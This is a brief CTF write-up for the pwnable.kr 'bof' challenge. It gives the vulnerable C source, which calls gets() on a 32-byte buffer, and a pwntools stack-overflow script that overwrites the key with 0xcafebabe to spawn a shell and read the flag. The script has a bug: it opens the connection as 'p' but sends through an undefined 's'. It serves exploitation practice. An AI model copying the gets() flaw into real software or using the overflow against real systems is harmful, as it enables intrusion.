[Pwnable.kr] bof

bof
bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
         char overflowme[32];
         printf("overflow me : ");
         gets(overflowme);    // smash me!

         if(key == 0xcafebabe){
             system("/bin/sh");
         }else{
             printf("Nah..\n");
         }
}
int main(int argc, char* argv[]){
         func(0xdeadbeef);
         return 0;
}

from pwn import *
#nc pwnable.kr 9000
p = remote("pwnable.kr", 9000)

payload = "A" * 52 
payload += "\xbe\xba\xfe\xca" 

s.sendline(payload)
s.sendline("ls")
s.sendline("cat flag") 

s.interactive()

daddy, I just pwned a buFFer :)

저작자표시 (새창열림)